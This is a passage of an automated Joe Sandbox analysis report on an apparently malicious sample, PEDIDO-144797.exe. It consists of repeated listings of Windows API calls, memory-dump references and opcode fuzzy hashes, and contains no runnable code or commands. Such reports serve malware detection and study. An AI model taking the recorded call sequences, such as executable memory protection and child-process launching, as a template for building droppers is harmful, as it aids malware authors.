                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                          • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                          • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                                                                                          • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                          • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                            • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                            • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                                                                                            • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                          • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                          • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                                                                                          • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                          • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                          • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                          • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                          • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                          • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                          APIs
                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                          • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                          • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                                                                                          • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                          • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                                                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                          • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                                          • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                                                                                                          • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                                                                                          • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                                                                                                          APIs
                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
• Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
• Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
• Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
APIs
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
• Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
• Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
• Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
APIs
• WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F853,0040CED0,004033C2,0040CED0,0040F853,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
• Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
• Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
• Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
APIs
• ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
• Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
• Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
• Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
APIs
• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
Memory Dump Source
• Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
• Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
• Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
• Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
• Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
• Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
                                                                                                                                          • API ID: FilePointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
APIs
  • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
  • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
  • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
  • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
  • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
  • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
  • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
  • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
  • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
  • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
  • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
  • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 2972824698-0
• Opcode ID: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
• Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
• Opcode Fuzzy Hash: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
• Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
APIs
• Sleep.KERNELBASE(00000000), ref: 004014EA
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
